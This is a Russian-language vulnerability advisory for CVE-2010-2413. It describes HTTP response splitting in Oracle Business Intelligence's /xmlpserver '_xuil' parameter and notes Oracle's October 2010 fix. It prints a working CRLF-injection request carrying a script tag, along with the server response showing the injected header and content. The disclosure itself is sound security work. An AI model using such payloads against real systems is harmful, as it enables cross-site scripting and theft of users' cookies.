CVE-2010-2413

Вендор

Oracle

Продукт

Oracle Business Intelligence Enterprise Edition (10.1.3.4.0) 

Тип уязвимости

Расщепление ответа сервера, межсайтовый скриптинг, фишинг

Reported

03.03.2009

Date of Public Advisory

25.10.2010

Автор

Александр Поляков

Детальное описание

Уязимость типа Response Splitting была вобнаружена в скрипте /xmlpserver, уязвимый параметр "_xuil" 
При посылке запроса с символами CRLF в параметре "_xuil" можно формировать собственные ответы от сервера 

Уязвимость можно использовать для внедрения межсайтового скриптинга в код ответа и кражи cookies пользователя. 

Пример 
*********
request: 

GET /xmlpserver/?_xuil=aaaaaaaaaa%0d%0a%0d%0a%0d%0a%0d%0a<html><script>alert('XSS')</script> HTTP/1.0 

Response: 

HTTP/1.1 200 OK 
Date: Tue, 03 Mar 2009 17:51:21 GMT 
Server: Oracle Containers for J2EE 
Content-Length: 7466 
Set-Cookie: ORA_XDO_UI=aaaaaaaaaa 

<html><script>alert('XSS')</script>; Comment=Oracle XML Publisher Cookie; Domain=.0.0.0; Expires=Wed, 03-Mar- 
2010 17:51:22 GMT; Path=/xmlpserver 
Set-Cookie: JSESSIONID=ac10006525e85e9ceb6e5e4846d6bcd0e9ceb6a0b2a3; path=/xmlps 
erver 
Cache-Control: private 
Connection: close 
Content-Type: text/html; charset=UTF-8 

<html LANG="en-US" dir="ltr">....................... 

Решение 
**********
Данная уязвимость исправлена в пакете обновлений, вышедшем 12 октября 2010 года. 
Все заказчики могут скачать и установить обновления, следуя инструкциям из официального Advisory.